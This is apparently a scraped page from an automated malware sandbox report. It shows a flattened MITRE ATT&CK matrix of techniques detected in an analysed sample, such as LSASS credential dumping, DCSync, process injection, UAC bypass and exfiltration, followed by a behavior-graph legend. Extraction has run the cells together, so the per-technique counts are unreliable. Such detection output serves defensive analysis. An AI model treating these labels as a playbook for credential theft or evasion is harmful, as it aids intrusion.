                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    21
                    Virtualization/Sandbox Evasion
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                    Process Injection
                    1
                    Access Token Manipulation
                    LSASS Memory231
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    11
                    Process Injection
                    Security Account Manager21
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Bypass User Account Control
                    1
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Account Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    System Owner/User Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync112
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Bypass User Account Control
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1567207